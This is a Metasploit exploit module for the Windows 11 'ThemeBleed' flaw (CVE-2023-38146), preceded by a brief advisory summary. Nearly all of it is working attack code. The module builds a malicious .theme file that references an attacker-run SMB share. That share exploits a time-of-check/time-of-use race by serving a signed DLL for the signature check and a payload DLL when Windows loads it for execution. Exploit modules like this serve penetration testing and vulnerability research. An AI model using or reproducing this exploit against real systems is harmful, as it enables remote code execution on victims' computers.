When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file’s PACKME_VERSION is 999, it then attempts to load an accompanying dll file ending in _vrf.dll. Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll.
advisories | CVE-2023-38146
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',
'Description' => %q{
When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the
msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll
file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by
opening the file for reading and verifying the signature before opening the file for execution.
Because this action is performed in two discrete operations, it opens the procedure for a time of check to
time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can
serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name
when the host intends to load/execute the dll.
},
'DisclosureDate' => '2023-09-13',
'Author' => [
'gabe_k', # Discovery/PoC
'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
],
'References' => [
['CVE', '2023-38146'],
['URL', 'https://exploits.forsale/themebleed/'],
['URL', 'https://github.com/gabe-k/themebleed/tree/main']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64,
'Targets' => [
[ 'Windows', {} ],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'AKA' => ['ThemeBleed']
},
'DefaultOptions' => { 'DisablePayloadHandler' => false }
)
)
register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*w*.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^w*(.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
])
deregister_options(
'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity
'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity
'FOLDER_NAME'
)
end
def file_format_filename
datastore['THEME_FILE_NAME']
end
def setup
super
@file = File.binread(datastore['STYLE_FILE'])
begin
pe = Rex::PeParsey::Pe.new_from_string(@file)
rescue Rex::PeParsey::PeError => e
fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")
end
unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)
fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')
end
@file_version_offset = pe.rva_to_file_offset(rva)
@file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']
@file_name << '.msstyles' unless @file_name.end_with?('.msstyles')
end
def primer
payload_dll = generate_payload_dll
max_length = [payload_dll.length, @file.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger
@file.ljust(max_length, "x00".b)
payload_dll.ljust(max_length, "x00".b)
virtual_disk = service.shares[@share]
@service = service
virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)
virtual_disk.add(virtual_file)
# install this hook for create requests to set the thread-local file content
virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|
next unless request.name.read_now!.encode.ends_with?('_vrf.dll')
if request.desired_access.execute == 1
virtual_file.tl_content = payload_dll
else
virtual_file.tl_content = @file
end
nil
end
file_create(make_theme)
end
def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}")
new_version = [999].pack('v')
@file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]
end
def make_theme
<<~THEME
[Theme]
DisplayName=@%SystemRoot%System32themeui.dll,-2060
[Control PanelDesktop]
Wallpaper=%SystemRoot%webwallpaperWindowsimg0.jpg
TileWallpaper=0
WallpaperStyle=10
[VisualStyles]
Path=\#{datastore['SRVHOST']}#{@share}#{@file_name}
ColorStyle=NormalColor
Size=NormalSize
[MasterThemeSelector]
MTSM=RJSPBS
THEME
end
class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile
def initialize(*args, **kwargs)
super
@default_content = @content
@tl_content = {}
@tl_content.compare_by_identity
end
def open(mode = 'r', &block)
@content = tl_content
super
end
def tl_content=(content)
@tl_content[Thread.current] = content
end
def tl_content
@tl_content.fetch(Thread.current, @default_content)
end
end
end